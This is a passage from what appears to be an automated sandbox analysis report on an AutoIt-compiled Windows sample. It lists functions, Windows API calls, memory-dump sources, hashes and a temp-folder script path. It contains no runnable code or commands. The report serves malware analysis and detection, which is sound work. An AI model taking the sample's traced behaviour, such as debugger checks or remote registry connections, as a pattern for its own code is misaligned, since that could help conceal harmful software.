                              • Part of subcall function 00AE1AB8: GetLastError.KERNEL32(?,?,00000000), ref: 00AE1B16
                              • Part of subcall function 00AE1AB8: VariantCopy.OLEAUT32(?,?), ref: 00AE1B6E
                              • Part of subcall function 00AE1AB8: VariantCopy.OLEAUT32(-00000068,?), ref: 00AE1B84
                              • Part of subcall function 00AE1AB8: VariantCopy.OLEAUT32(-00000088,?), ref: 00AE1B9D
                              • Part of subcall function 00AE1AB8: VariantClear.OLEAUT32(-00000058), ref: 00AE1C17
                            • CLSIDFromProgID.OLE32(00000000,?,?), ref: 00AFC284
                            • GetActiveObject.OLEAUT32(?,00000000,?), ref: 00AFC29E
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Variant$Copy$ActiveBindClearCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcslen
                            • String ID:
                            • API String ID: 2728119192-0
                            • Opcode ID: dd8aa6411f731d6a69205b4d2cf8ad33b01e677324278659aab48a8f66e7f8f1
                            • Instruction ID: 1441683bb0cc335ad2578777b83d4677bb74caac3bad930fc4fde20169283546
                            • Opcode Fuzzy Hash: dd8aa6411f731d6a69205b4d2cf8ad33b01e677324278659aab48a8f66e7f8f1
                            • Instruction Fuzzy Hash: 90817C71218349ABD704EBA4CD81FABB3E8FF88710F10491CF64597291EB70E905CBA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AAA128, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                            Download Yara Rule
                            APIs
                            • IsDebuggerPresent.KERNEL32 ref: 00AB1EE1
                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00AB1EF6
                            • UnhandledExceptionFilter.KERNEL32(00B143DC), ref: 00AB1F01
                            • GetCurrentProcess.KERNEL32(C0000409), ref: 00AB1F1D
                            • TerminateProcess.KERNEL32(00000000), ref: 00AB1F24
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                            • String ID:
                            • API String ID: 2579439406-0
                            • Opcode ID: 88dcf67dc51a64d376d3833f28936a836fda66b00f340f911e9b91a31513d744
                            • Instruction ID: 3afaad0fc162adb290587fdc0212e8a7d9cdacbd2f2a56536ef7e6326fe3c491
                            • Opcode Fuzzy Hash: 88dcf67dc51a64d376d3833f28936a836fda66b00f340f911e9b91a31513d744
                            • Instruction Fuzzy Hash: 0F2120B489A204DFD760DF64FD496443BA4FB0A301F90465AF90897371EFB99892CF19
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AFE0F6, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00AD2654: _wcslen.LIBCMT ref: 00AD2680
                            • CoInitialize.OLE32(00000000), ref: 00AFE16E
                            • CoCreateInstance.OLE32(00B12A08,00000000,00000001,00B128A8,?), ref: 00AFE187
                            • CoUninitialize.OLE32 ref: 00AFE1A6
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                            • String ID: .lnk
                            • API String ID: 886957087-24824748
                            • Opcode ID: d9bbf185ea52e627c02b4417026e59c1663526652cfeb53017f92092caacee4a
                            • Instruction ID: 04baaf47b478ee788b25b68e2d4259ac4da308d2c20b9031bb21b61fbaeb507d
                            • Opcode Fuzzy Hash: d9bbf185ea52e627c02b4417026e59c1663526652cfeb53017f92092caacee4a
                            • Instruction Fuzzy Hash: 09A14D76A042029FCB04EFA4C984E6BB7E9BF88710F148A5CF9959B351D731EC45CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AE90AA, Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
                            Download Yara Rule
                            APIs
                            • DestroyWindow.USER32(?), ref: 00AE90DF
                            • SystemParametersInfoW.USER32 ref: 00AE919C
                            • SetRect.USER32 ref: 00AE91DC
                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00AE91ED
                            • CreateWindowExW.USER32 ref: 00AE922F
                            • GetClientRect.USER32 ref: 00AE923B
                            • CreateWindowExW.USER32 ref: 00AE927D
                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00AE928F
                            • GetStockObject.GDI32(00000011), ref: 00AE9299
                            • SelectObject.GDI32(00000000,00000000), ref: 00AE92A1
                            • GetTextFaceW.GDI32(00000000,00000040,?), ref: 00AE92B1
                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AE92BA
                            • DeleteDC.GDI32(00000000), ref: 00AE92C3
                            • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00AE9309
                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00AE9321
                            • CreateWindowExW.USER32 ref: 00AE935B
                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00AE936F
                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00AE9380
                            • CreateWindowExW.USER32 ref: 00AE93B5
                            • GetStockObject.GDI32(00000011), ref: 00AE93C0
                            • SendMessageW.USER32(?,00000030,00000000), ref: 00AE93D0
                            • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00AE93DB
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                            • API String ID: 2910397461-517079104
                            • Opcode ID: b5496e38054714e645fd5737d8983f28450479db0a4103da0cc0781c5c530cb3
                            • Instruction ID: 17cc8d2d01ce854cca4df677ee8ddef931169faede485d79faa4f855e149cf04
                            • Opcode Fuzzy Hash: b5496e38054714e645fd5737d8983f28450479db0a4103da0cc0781c5c530cb3
                            • Instruction Fuzzy Hash: F9A18071B90304BFEB14DF64DD4AFAE7769EB44711F108214FB05BB2D0DAB0A9018B64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AC41CD, Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __wcsicoll$IconLoad
                            • String ID: blank$info$question$stop$warning
                            • API String ID: 2485277191-404129466
                            • Opcode ID: 09a658985e7d12a3870959f775696cf7830875afd8b123462e50f4e3b5d71e34
                            • Instruction ID: 0e9ce1274f60ddb08dd4ae2938d6e5c68a7eb26de7d36b111473339165ab3427
                            • Opcode Fuzzy Hash: 09a658985e7d12a3870959f775696cf7830875afd8b123462e50f4e3b5d71e34
                            • Instruction Fuzzy Hash: 8321D37274020576DB019F65BD06FEA339C9F69362F004036FA04E7186E7A1A93592F9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A92190, Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 202COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00A91D10: _wcslen.LIBCMT ref: 00A91D11
                              • Part of subcall function 00A91D10: _memmove.LIBCMT ref: 00A91D57
                            • __wcsicoll.LIBCMT ref: 00A92262
                            • __wcsicoll.LIBCMT ref: 00A92278
                            • __wcsicoll.LIBCMT ref: 00A9228E
                              • Part of subcall function 00AA13CB: __wcsicmp_l.LIBCMT ref: 00AA144B
                            • __wcsicoll.LIBCMT ref: 00A922A4
                            • _wcscpy.LIBCMT ref: 00A922C4
                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg,00000104), ref: 00AB8AD6
                            • _wcscpy.LIBCMT ref: 00AB8B29
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __wcsicoll$_wcscpy$FileModuleName__wcsicmp_l_memmove_wcslen
                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg$CMDLINE$CMDLINERAW
                            • API String ID: 574121520-2189407872
                            • Opcode ID: 26432ad506bf60b3cc27428fd62b7e8f2d014ffe03c5426cd4efe0c1436f0705
                            • Instruction ID: 2abe61da1c21849b9ca67967197ead5c3437ce07857aa9819f0fd04711e2f878
                            • Opcode Fuzzy Hash: 26432ad506bf60b3cc27428fd62b7e8f2d014ffe03c5426cd4efe0c1436f0705
                            • Instruction Fuzzy Hash: B0717271E1420AABCF10EBE4DE92AEE77F9AF40344F504468E5057B192EF706949C7E1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AF910A, Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
                            Download Yara Rule
                            APIs
                            • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 00AF9155
                            • GetFocus.USER32 ref: 00AF9169
                            • GetDlgCtrlID.USER32 ref: 00AF9174
                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 00AF91C8
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: MessagePost$CtrlFocus
                            • String ID: 0
                            • API String ID: 1534620443-4108050209
                            • Opcode ID: 290bf3cb0a4d7a88682eac142eb754c564998adede641248dcdb47fc0963bded
                            • Instruction ID: 9dcbd52c3599b4b89f6896cad6721e5cfef60d1066702bcdf35983aa859303a1
                            • Opcode Fuzzy Hash: 290bf3cb0a4d7a88682eac142eb754c564998adede641248dcdb47fc0963bded
                            • Instruction Fuzzy Hash: C791E071604319AFD720DF94D885BBBB7E8FB88714F00461EFA9497291DBB0D854CBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B02095, Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON
                            Download Yara Rule
                            APIs
                            • GetLocalTime.KERNEL32(?), ref: 00B0225C
                            • __swprintf.LIBCMT ref: 00B02273
                            • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,00B1BF48), ref: 00B024A6
                            • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,00B1BF48), ref: 00B024C0
                            • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,00B1BF48), ref: 00B024DA
                            • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,00B1BF48), ref: 00B024F4
                            • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,00B1BF48), ref: 00B0250E
                            • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,00B1BF48), ref: 00B02528
                            • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,00B1BF48), ref: 00B02542
                            • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,00B1BF48), ref: 00B0255C
                            • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,00B1BF48), ref: 00B02576
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: FolderPath$LocalTime__swprintf
                            • String ID: %.3d
                            • API String ID: 3337348382-986655627
                            • Opcode ID: 2edf138a864288e7b197fb4f8794b15e2a3d82c8e83374971c5c672177752f46
                            • Instruction ID: 44fc2b17dab3371a655c9e6dd70b97ff5d785a43a20f0834b3bde71e89d27c80
                            • Opcode Fuzzy Hash: 2edf138a864288e7b197fb4f8794b15e2a3d82c8e83374971c5c672177752f46
                            • Instruction Fuzzy Hash: 58C1DC32764218ABDF10EBA4DD8AFED73B8FB44700F4045A9F509A71C1DB719E198B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AC000A, Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00AC0030
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00AC004B
                            • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00AC0056
                            • GlobalLock.KERNEL32 ref: 00AC0063
                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00AC0072
                            • GlobalUnlock.KERNEL32(00000000), ref: 00AC0079
                            • CloseHandle.KERNEL32(00000000), ref: 00AC0080
                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00AC008D
                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00B129F8,?), ref: 00AC00AB
                            • GlobalFree.KERNEL32 ref: 00AC00BD
                            • GetObjectW.GDI32(?,00000018,?), ref: 00AC00E4
                            • CopyImage.USER32 ref: 00AC0115
                            • DeleteObject.GDI32(?), ref: 00AC013D
                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00AC0154
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                            • String ID:
                            • API String ID: 3969911579-0
                            • Opcode ID: 0e724de36d9cb72fd4c9e5f3883e94b23cbff085e0cc78e097153d13d138e142
                            • Instruction ID: 7aca9c9ebaed5f86d668fa12b739c0b5f8d46d81c9621b617b5a892710781966
                            • Opcode Fuzzy Hash: 0e724de36d9cb72fd4c9e5f3883e94b23cbff085e0cc78e097153d13d138e142
                            • Instruction Fuzzy Hash: 04413D75640208EFDB10DF94DC85FAEB7B8EF49711F108159FA05AB290DB74AE11CB64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AE516A, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                            • String ID: 0
                            • API String ID: 956284711-4108050209
                            • Opcode ID: ac6a5fddf5048e2cb1c7a8b91eabe61336712ae4a36ee30cd7df0f2e36d98c75
                            • Instruction ID: d1fea9b1ad36999f66b1f6270496741b28ba4186d9455dcb91721031df4fcdd6
                            • Opcode Fuzzy Hash: ac6a5fddf5048e2cb1c7a8b91eabe61336712ae4a36ee30cd7df0f2e36d98c75
                            • Instruction Fuzzy Hash: CB415870700742AFD714DF76E898BAAB7A9FF48304F548618F955CB290DB70E850CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AD9112, Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,?,000000FF,?), ref: 00AD91FD
                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00AD9210
                            • CharNextW.USER32(?,?,?,000000FF,?), ref: 00AD9242
                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00AD925A
                            • SendMessageW.USER32(?,?,00000000,?), ref: 00AD928B
                            • SendMessageW.USER32(?,?,000000FF,?), ref: 00AD92A2
                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00AD92B5
                            • SendMessageW.USER32(?,00000402,?), ref: 00AD92F2
                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00AD9366
                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AD93D0
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: MessageSend$CharNext
                            • String ID:
                            • API String ID: 1350042424-0
                            • Opcode ID: 5cb61bb4bb389d40e71413861a02be77f762a564eb15e3931b467f8207629638
                            • Instruction ID: d43262ce211e88b626f4b5a62188b5bf5c39eede90cc5d733305cf85e6d2c151
                            • Opcode Fuzzy Hash: 5cb61bb4bb389d40e71413861a02be77f762a564eb15e3931b467f8207629638
                            • Instruction Fuzzy Hash: 5281C135A00208ABDB10CF94DC85FFFB7B8EB55720F10825AFA159B2C0DB759951CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AE3126, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __swprintf_wcscpy$__i64tow__itow
                            • String ID: %.15g$0x%p$False$True
                            • API String ID: 3038501623-2263619337
                            • Opcode ID: f3dc0b0e4df0b67e9e86aad51e0ab1db6a47d982bb697dac1c7fba89a12fbeb1
                            • Instruction ID: 74634db738295ff8b03d3a183e4714db1d712c4c8e112a8ff20f66efbbb77ecb
                            • Opcode Fuzzy Hash: f3dc0b0e4df0b67e9e86aad51e0ab1db6a47d982bb697dac1c7fba89a12fbeb1
                            • Instruction Fuzzy Hash: BC410EB39002145BDF10EB75DD86FA67378EF5A300F0445A5FA49DB241E731DA58C7A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AFB028, Relevance: 16.9, APIs: 11, Instructions: 400registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00A91D10: _wcslen.LIBCMT ref: 00A91D11
                              • Part of subcall function 00A91D10: _memmove.LIBCMT ref: 00A91D57
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AFB103
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ConnectRegistry_memmove_wcslen
                            • String ID:
                            • API String ID: 15295421-0
                            • Opcode ID: 5b4d7e81777b20f149a8000e0edb3800dbc2972a1b4aa9474e238bd929c006de
                            • Instruction ID: dbf4ac5b04b8046d5a36ac43e2354a624fbffa3bc06b0c35639777269dfdf00e
                            • Opcode Fuzzy Hash: 5b4d7e81777b20f149a8000e0edb3800dbc2972a1b4aa9474e238bd929c006de
                            • Instruction Fuzzy Hash: A9E13071614205AFDB14EF68CD81F2AB7F4AF88704F148A1CF6858B281DB75ED01CBA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AC3044, Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                            Download Yara Rule
                            APIs
                            • __swprintf.LIBCMT ref: 00AC3058
                            • __swprintf.LIBCMT ref: 00AC306A
                            • __wcsicoll.LIBCMT ref: 00AC3077
                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 00AC308A
                            • LoadResource.KERNEL32(?,00000000), ref: 00AC30A2
                            • LockResource.KERNEL32(00000000), ref: 00AC30AF
                            • FindResourceW.KERNEL32(?,?,00000003), ref: 00AC30DC
                            • LoadResource.KERNEL32(?,00000000), ref: 00AC30EA
                            • SizeofResource.KERNEL32(?,00000000), ref: 00AC30F9
                            • LockResource.KERNEL32(?), ref: 00AC3105
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                            • String ID:
                            • API String ID: 1158019794-0
                            • Opcode ID: abd0ab477960f77ee7d66bec25cc71568a775288589641d4a99112c07e0aaef8
                            • Instruction ID: e3ac6e6fcdc54cea2888854c37d37481cb96c8f0cbb552774edf4d69352ec32f
                            • Opcode Fuzzy Hash: abd0ab477960f77ee7d66bec25cc71568a775288589641d4a99112c07e0aaef8
                            • Instruction Fuzzy Hash: B641BC32604219ABCF20DF65EC84FEB77A9EB89310F04C15AF905DB280EB75DA51C7A4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B010AB, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00AE6308: GetCursorPos.USER32(?), ref: 00AE631D
                              • Part of subcall function 00AE6308: ScreenToClient.USER32 ref: 00AE633A
                              • Part of subcall function 00AE6308: GetAsyncKeyState.USER32(?), ref: 00AE6377
                              • Part of subcall function 00AE6308: GetAsyncKeyState.USER32(?), ref: 00AE6387
